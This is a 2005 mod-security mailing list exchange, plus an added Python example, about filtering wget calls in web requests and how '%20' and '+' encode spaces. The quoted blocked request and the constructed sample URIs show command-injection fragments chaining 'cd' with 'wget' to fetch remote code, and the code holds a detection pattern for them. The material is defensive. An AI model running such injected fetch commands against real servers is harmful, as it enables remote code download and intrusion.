RE: [mod-security-users] Wget filter
From: Tkachenko A. <al...@tk...> - 2005-01-28 07:06:21
Thank you, Oliver.
Still don't understand why my filter block and "wget" also :(

Alexey.

-----Original Message-----
From: Oliver Schneider [mailto:Bor...@gm...]
Sent: Friday, January 28, 2005 01:43
To: Tkachenko Alexei
Cc: mod...@li...
Subject: Re: [mod-security-users] Wget filter

Privet,

> 1) My logs always contain "wget+" but no "wget%" even if the following
> request was blocked "cd%20.temp22;wget%20http://".
> Why so? Why my log does not contain "wget%" at all?

%20 is the escaped version of a blank space. (0x20 is the hexadecimal
representation of the character code 32 which is a blank space).
wget+ represents exactly the same, because blank space has two different
representations in this encoding scheme: + and %20.
Seems that Apache internally decodes %20 but not + which is natural since +
may be a valid filename character. Hence you would find "wget " but not
"wget%".

By the way: this will only filter WGET calls (executing WGET), WGET itself
allows to mimic any browser and cannot be blocked as a client.

Oliver

--
---------------------------------------------------
May the source be with you, stranger ;)

ICQ: #281645
URL: http://assarbad.net
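
An added example (not part of either message and not mod_security's own code) of the encoding point in the reply above: a log check that decodes `%20` and `+` before matching, beside a raw search for `wget%`. The request lines, the `example.invalid` host and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus

# Hypothetical rule: the command name "wget" followed by whitespace, matched
# after decoding so one pattern covers "wget%20", "wget+" and "wget ".
WGET_CALL = re.compile(r"\bwget\s", re.IGNORECASE)

# Constructed request URIs (not taken from real logs).
SAMPLES = [
    "/cgi-bin/test.cgi?cmd=cd%20.temp22;wget%20http://example.invalid/x",
    "/cgi-bin/test.cgi?cmd=cd+.temp22;wget+http://example.invalid/x",
    "/downloads/wget+manual.html",   # "+" in a path is a literal character
    "/index.html?page=about",
]


def normalise(uri):
    """Return (path, query) with URL escapes decoded.

    In the path only %XX is an escape and "+" stays a literal plus sign.
    In the query string "+" is also shorthand for a blank space.
    """
    path, _, query = uri.partition("?")
    return unquote(path), unquote_plus(query)


def calls_wget(uri):
    """True if the decoded request contains "wget" followed by whitespace."""
    path, query = normalise(uri)
    return bool(WGET_CALL.search(path) or WGET_CALL.search(query))


def raw_match(uri, needle="wget%"):
    """Substring search on the undecoded URI, for comparison."""
    return needle in uri


if __name__ == "__main__":
    for uri in SAMPLES:
        print(f"raw 'wget%': {raw_match(uri)!s:5}  "
              f"decoded 'wget ': {calls_wget(uri)!s:5}  {uri}")
```

The raw search only finds the `%20` form, while the decoded match finds both encodings and leaves the literal `+` in the path alone.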